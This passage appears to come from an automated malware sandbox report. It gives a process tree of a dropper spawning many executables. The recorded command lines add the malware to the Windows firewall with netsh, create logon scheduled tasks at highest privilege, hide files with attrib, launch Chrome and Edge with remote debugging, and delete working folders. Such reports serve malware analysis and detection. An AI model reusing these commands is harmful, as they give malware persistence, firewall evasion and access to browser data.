    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:5228
  - - C:\Users\Admin\AppData\Local\Temp\a\bin2Srv.exe
      C:\Users\Admin\AppData\Local\Temp\a\bin2Srv.exe
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      PID:5288
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5288 -s 320
        5⤵
        Program crash
        
        PID:5348
- - C:\Users\Admin\AppData\Local\Temp\a\cHSzTDjVl.exe
    "C:\Users\Admin\AppData\Local\Temp\a\cHSzTDjVl.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:3576
- - C:\Users\Admin\AppData\Local\Temp\a\ServerX.exe
    "C:\Users\Admin\AppData\Local\Temp\a\ServerX.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:5536
  - - C:\Users\Admin\AppData\Roaming\server.exe
      "C:\Users\Admin\AppData\Roaming\server.exe"
      4⤵
      Drops startup file
      Executes dropped EXE
      Drops file in System32 directory
      System Location Discovery: System Language Discovery
      Suspicious behavior: GetForegroundWindowSpam
      PID:1908
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall add allowedprogram "C:\Users\Admin\AppData\Roaming\server.exe" "server.exe" ENABLE
        5⤵
        Modifies Windows Firewall
        Event Triggered Execution: Netsh Helper DLL
        System Location Discovery: System Language Discovery
        
        PID:5280
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall delete allowedprogram "C:\Users\Admin\AppData\Roaming\server.exe"
        5⤵
        Modifies Windows Firewall
        Event Triggered Execution: Netsh Helper DLL
        System Location Discovery: System Language Discovery
        
        PID:5688
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall add allowedprogram "C:\Users\Admin\AppData\Roaming\server.exe" "server.exe" ENABLE
        5⤵
        Modifies Windows Firewall
        Event Triggered Execution: Netsh Helper DLL
        System Location Discovery: System Language Discovery
        
        PID:4212
    - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
        
        dw20.exe -x -s 1368
        5⤵
        System Location Discovery: System Language Discovery
        Checks processor information in registry
        Enumerates system info in registry
        
        PID:7920
- - C:\Users\Admin\AppData\Local\Temp\a\LinkedinTuVanDat.exe
    "C:\Users\Admin\AppData\Local\Temp\a\LinkedinTuVanDat.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:5348
- - C:\Users\Admin\AppData\Local\Temp\a\sas.exe
    "C:\Users\Admin\AppData\Local\Temp\a\sas.exe"
    3⤵
    - Executes dropped EXE
    PID:5292
- - C:\Users\Admin\AppData\Local\Temp\a\giania.exe
    "C:\Users\Admin\AppData\Local\Temp\a\giania.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:2308
- - C:\Users\Admin\AppData\Local\Temp\a\code.exe
    "C:\Users\Admin\AppData\Local\Temp\a\code.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:4696
- - C:\Users\Admin\AppData\Local\Temp\a\laserrr.exe
    "C:\Users\Admin\AppData\Local\Temp\a\laserrr.exe"
    3⤵
    - Downloads MZ/PE file
    - Executes dropped EXE
    PID:6060
  - - C:\Users\Admin\AppData\Local\Temp\RegAAsm.exe
      "C:\Users\Admin\AppData\Local\Temp\RegAAsm.exe"
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      PID:5196
- - C:\Users\Admin\AppData\Local\Temp\a\pure.exe
    "C:\Users\Admin\AppData\Local\Temp\a\pure.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:3704
- - C:\Users\Admin\AppData\Local\Temp\a\GRAW.exe
    "C:\Users\Admin\AppData\Local\Temp\a\GRAW.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetWindowsHookEx
    PID:7220
- - C:\Users\Admin\AppData\Local\Temp\a\svc.exe
    "C:\Users\Admin\AppData\Local\Temp\a\svc.exe"
    3⤵
    - Downloads MZ/PE file
    - Executes dropped EXE
    PID:7496
  - - C:\Users\Admin\AppData\Local\Temp\temp_12152.exe
      "C:\Users\Admin\AppData\Local\Temp\temp_12152.exe"
      4⤵
      Executes dropped EXE
      PID:1500
    - - C:\Users\Admin\AppData\Local\Temp\temp_12152.exe
        
        "C:\Users\Admin\AppData\Local\Temp\temp_12152.exe"
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:7440
  - - C:\Users\Admin\AppData\Local\Temp\temp_12165.exe
      "C:\Users\Admin\AppData\Local\Temp\temp_12165.exe"
      4⤵
      Executes dropped EXE
      Adds Run key to start application
      System Location Discovery: System Language Discovery
      PID:5488
  - - C:\Users\Admin\AppData\Local\Temp\temp_12168.exe
      "C:\Users\Admin\AppData\Local\Temp\temp_12168.exe"
      4⤵
      Executes dropped EXE
      PID:7344
- - C:\Users\Admin\AppData\Local\Temp\a\laser.exe
    "C:\Users\Admin\AppData\Local\Temp\a\laser.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:6484
- - C:\Users\Admin\AppData\Local\Temp\a\client2.exe
    "C:\Users\Admin\AppData\Local\Temp\a\client2.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - System Location Discovery: System Language Discovery
    PID:6284
  - - C:\Users\Admin\AppData\Local\Temp\a\client2.exe
      "C:\Users\Admin\AppData\Local\Temp\a\client2.exe"
      4⤵
      Executes dropped EXE
      PID:5664
  - - C:\Users\Admin\AppData\Local\Temp\a\client2.exe
      "C:\Users\Admin\AppData\Local\Temp\a\client2.exe"
      4⤵
      Executes dropped EXE
      Checks SCSI registry key(s)
      PID:4972
  - - C:\Users\Admin\AppData\Local\Temp\a\client2.exe
      "C:\Users\Admin\AppData\Local\Temp\a\client2.exe"
      4⤵
      Executes dropped EXE
      PID:7528
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 6284 -s 860
      4⤵
      Program crash
      PID:6808
- - C:\Users\Admin\AppData\Local\Temp\a\client.exe
    "C:\Users\Admin\AppData\Local\Temp\a\client.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - System Location Discovery: System Language Discovery
    PID:7892
  - - C:\Users\Admin\AppData\Local\Temp\a\client.exe
      "C:\Users\Admin\AppData\Local\Temp\a\client.exe"
      4⤵
      Executes dropped EXE
      PID:5284
  - - C:\Users\Admin\AppData\Local\Temp\a\client.exe
      "C:\Users\Admin\AppData\Local\Temp\a\client.exe"
      4⤵
      Executes dropped EXE
      PID:6328
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 7892 -s 836
      4⤵
      Program crash
      PID:6604
- - C:\Users\Admin\AppData\Local\Temp\a\svc1.exe
    "C:\Users\Admin\AppData\Local\Temp\a\svc1.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - System Location Discovery: System Language Discovery
    PID:7740
  - - C:\Users\Admin\AppData\Local\Temp\a\svc1.exe
      "C:\Users\Admin\AppData\Local\Temp\a\svc1.exe"
      4⤵
      Executes dropped EXE
      PID:6648
  - - C:\Users\Admin\AppData\Local\Temp\a\svc1.exe
      "C:\Users\Admin\AppData\Local\Temp\a\svc1.exe"
      4⤵
      Executes dropped EXE
      PID:6388
  - - C:\Users\Admin\AppData\Local\Temp\a\svc1.exe
      "C:\Users\Admin\AppData\Local\Temp\a\svc1.exe"
      4⤵
      Executes dropped EXE
      PID:5188
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 7740 -s 840
      4⤵
      Program crash
      PID:7940
- - C:\Users\Admin\AppData\Local\Temp\a\fusca%20game.exe
    "C:\Users\Admin\AppData\Local\Temp\a\fusca%20game.exe"
    3⤵
    - Executes dropped EXE
    - Adds Run key to start application
    - System Location Discovery: System Language Discovery
    PID:6652
  - - C:\Windows\SysWOW64\netsh.exe
      netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\a\fusca%20game.exe" "fusca%20game.exe" ENABLE
      4⤵
      Modifies Windows Firewall
      PID:5128
- - C:\Users\Admin\AppData\Local\Temp\a\svchost.exe
    "C:\Users\Admin\AppData\Local\Temp\a\svchost.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:6692
  - - C:\Users\Admin\AppData\Local\Temp\svchost.exe
      "C:\Users\Admin\AppData\Local\Temp\svchost.exe"
      4⤵
      PID:3792
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\svchost.exe" "svchost.exe" ENABLE
        5⤵
        Modifies Windows Firewall
        
        PID:8168
- - C:\Users\Admin\AppData\Local\Temp\a\jrirkfiweid.exe
    "C:\Users\Admin\AppData\Local\Temp\a\jrirkfiweid.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:4732
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
      4⤵
      Uses browser remote debugging
      PID:7296
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7fffdf8acc40,0x7fffdf8acc4c,0x7fffdf8acc58
        5⤵
        
        PID:6140
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=2344,i,5755703894492230525,612369008310471936,262144 --variations-seed-version=20250207-050113.109000 --mojo-platform-channel-handle=2340 /prefetch:2
        5⤵
        
        PID:5888
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=272,i,5755703894492230525,612369008310471936,262144 --variations-seed-version=20250207-050113.109000 --mojo-platform-channel-handle=2436 /prefetch:3
        5⤵
        
        PID:6212
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=1948,i,5755703894492230525,612369008310471936,262144 --variations-seed-version=20250207-050113.109000 --mojo-platform-channel-handle=2560 /prefetch:8
        5⤵
        
        PID:7608
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
      4⤵
      Uses browser remote debugging
      PID:2912
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7fffd6facc40,0x7fffd6facc4c,0x7fffd6facc58
        5⤵
        
        PID:4944
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
      4⤵
      Uses browser remote debugging
      PID:7516
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=132.0.6834.160 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=132.0.2957.140 --initial-client-data=0x240,0x244,0x248,0x23c,0x268,0x7fffc06fb078,0x7fffc06fb084,0x7fffc06fb090
        5⤵
        
        PID:5564
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
      4⤵
      Uses browser remote debugging
      PID:6500
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=132.0.6834.160 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=132.0.2957.140 --initial-client-data=0x240,0x244,0x248,0x23c,0x268,0x7fffc06fb078,0x7fffc06fb084,0x7fffc06fb090
        5⤵
        
        PID:5892
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
      4⤵
      Uses browser remote debugging
      PID:5768
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=132.0.6834.160 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=132.0.2957.140 --initial-client-data=0x240,0x244,0x248,0x23c,0x268,0x7fffc06fb078,0x7fffc06fb084,0x7fffc06fb090
        5⤵
        
        PID:7792
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
      4⤵
      Uses browser remote debugging
      PID:6012
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=132.0.6834.160 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=132.0.2957.140 --initial-client-data=0x240,0x244,0x248,0x23c,0x268,0x7fffc06fb078,0x7fffc06fb084,0x7fffc06fb090
        5⤵
        
        PID:7612
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=2132,i,3151210138304214635,1800848119322011554,262144 --variations-seed-version --mojo-platform-channel-handle=2128 /prefetch:2
        5⤵
        
        PID:7776
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --always-read-main-dll --field-trial-handle=1836,i,3151210138304214635,1800848119322011554,262144 --variations-seed-version --mojo-platform-channel-handle=2484 /prefetch:11
        5⤵
        
        PID:8004
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --always-read-main-dll --field-trial-handle=2488,i,3151210138304214635,1800848119322011554,262144 --variations-seed-version --mojo-platform-channel-handle=3132 /prefetch:13
        5⤵
        
        PID:6792
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --always-read-main-dll --field-trial-handle=3512,i,3151210138304214635,1800848119322011554,262144 --variations-seed-version --mojo-platform-channel-handle=3596 /prefetch:1
        5⤵
        Uses browser remote debugging
        
        PID:7696
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --instant-process --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --always-read-main-dll --field-trial-handle=3520,i,3151210138304214635,1800848119322011554,262144 --variations-seed-version --mojo-platform-channel-handle=3748 /prefetch:1
        5⤵
        Uses browser remote debugging
        
        PID:6264
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\7ymoh" & exit
      4⤵
      PID:7824
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 10
        5⤵
        Delays execution with timeout.exe
        
        PID:5412
- - C:\Users\Admin\AppData\Local\Temp\a\filfin1.exe
    "C:\Users\Admin\AppData\Local\Temp\a\filfin1.exe"
    3⤵
    PID:7272
  - - C:\Windows\SYSTEM32\schtasks.exe
      "schtasks" /create /tn "svchoost.exe" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:2496
- - C:\Users\Admin\AppData\Local\Temp\a\cjrimgid.exe
    "C:\Users\Admin\AppData\Local\Temp\a\cjrimgid.exe"
    3⤵
    PID:5364
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
      4⤵
      Uses browser remote debugging
      PID:4008
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7fffdf8acc40,0x7fffdf8acc4c,0x7fffdf8acc58
        5⤵
        
        PID:5360
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
      4⤵
      Uses browser remote debugging
      PID:7488
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7fffd6facc40,0x7fffd6facc4c,0x7fffd6facc58
        5⤵
        
        PID:7656
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=2216,i,4962160819983303141,7565308696131099012,262144 --variations-seed-version=20250207-050113.109000 --mojo-platform-channel-handle=2240 /prefetch:2
        5⤵
        
        PID:1720
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=1668,i,4962160819983303141,7565308696131099012,262144 --variations-seed-version=20250207-050113.109000 --mojo-platform-channel-handle=2464 /prefetch:3
        5⤵
        
        PID:3488
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=1876,i,4962160819983303141,7565308696131099012,262144 --variations-seed-version=20250207-050113.109000 --mojo-platform-channel-handle=2596 /prefetch:8
        5⤵
        
        PID:6788
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3144,i,4962160819983303141,7565308696131099012,262144 --variations-seed-version=20250207-050113.109000 --mojo-platform-channel-handle=3164 /prefetch:1
        5⤵
        Uses browser remote debugging
        
        PID:8004
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3172,i,4962160819983303141,7565308696131099012,262144 --variations-seed-version=20250207-050113.109000 --mojo-platform-channel-handle=3356 /prefetch:1
        5⤵
        Uses browser remote debugging
        
        PID:8088
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4564,i,4962160819983303141,7565308696131099012,262144 --variations-seed-version=20250207-050113.109000 --mojo-platform-channel-handle=4532 /prefetch:1
        5⤵
        Uses browser remote debugging
        
        PID:4408
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4580,i,4962160819983303141,7565308696131099012,262144 --variations-seed-version=20250207-050113.109000 --mojo-platform-channel-handle=4212 /prefetch:8
        5⤵
        
        PID:7360
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4268,i,4962160819983303141,7565308696131099012,262144 --variations-seed-version=20250207-050113.109000 --mojo-platform-channel-handle=4860 /prefetch:8
        5⤵
        
        PID:8152
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5048,i,4962160819983303141,7565308696131099012,262144 --variations-seed-version=20250207-050113.109000 --mojo-platform-channel-handle=5052 /prefetch:8
        5⤵
        
        PID:3596
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=5080,i,4962160819983303141,7565308696131099012,262144 --variations-seed-version=20250207-050113.109000 --mojo-platform-channel-handle=4852 /prefetch:8
        5⤵
        
        PID:3160
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
      4⤵
      Uses browser remote debugging
      PID:2088
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
      4⤵
      Uses browser remote debugging
      PID:6132
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
      4⤵
      Uses browser remote debugging
      PID:6172
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
      4⤵
      Uses browser remote debugging
      PID:2132
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\3ectj" & exit
      4⤵
      PID:424
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 10
        5⤵
        Delays execution with timeout.exe
        
        PID:3596
- - C:\Users\Admin\AppData\Local\Temp\a\CPDB.exe
    "C:\Users\Admin\AppData\Local\Temp\a\CPDB.exe"
    3⤵
    PID:5704
- - C:\Users\Admin\AppData\Local\Temp\a\Server.exe
    "C:\Users\Admin\AppData\Local\Temp\a\Server.exe"
    3⤵
    PID:8048
- - C:\Users\Admin\AppData\Local\Temp\a\discord.exe
    "C:\Users\Admin\AppData\Local\Temp\a\discord.exe"
    3⤵
    PID:6944
  - - C:\Windows\SysWOW64\schtasks.exe
      "schtasks.exe" /create /f /tn "TCP Monitor" /xml "C:\Users\Admin\AppData\Local\Temp\tmp81C9.tmp"
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:4956
  - - C:\Windows\SysWOW64\schtasks.exe
      "schtasks.exe" /create /f /tn "TCP Monitor Task" /xml "C:\Users\Admin\AppData\Local\Temp\tmp9264.tmp"
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:7872
- - C:\Users\Admin\AppData\Local\Temp\a\winX32.exe
    "C:\Users\Admin\AppData\Local\Temp\a\winX32.exe"
    3⤵
    PID:8160
  - - C:\Users\Admin\AppData\Roaming\winX32.exe
      "C:\Users\Admin\AppData\Roaming\winX32.exe"
      4⤵
      PID:6280
  - - C:\Windows\SysWOW64\attrib.exe
      attrib +h +r +s "C:\Users\Admin\AppData\Roaming\winX32.exe"
      4⤵
      Views/modifies file attributes
      PID:6932
- - C:\Users\Admin\AppData\Local\Temp\a\Discord2.exe
    "C:\Users\Admin\AppData\Local\Temp\a\Discord2.exe"
    3⤵
    PID:4776
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "Discord" /tr '"C:\Users\Admin\AppData\Roaming\Discord.exe"' & exit
      4⤵
      PID:4216
    - - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /f /sc onlogon /rl highest /tn "Discord" /tr '"C:\Users\Admin\AppData\Roaming\Discord.exe"'
        5⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:5580
  - - C:\Windows\SysWOW64\cmd.exe
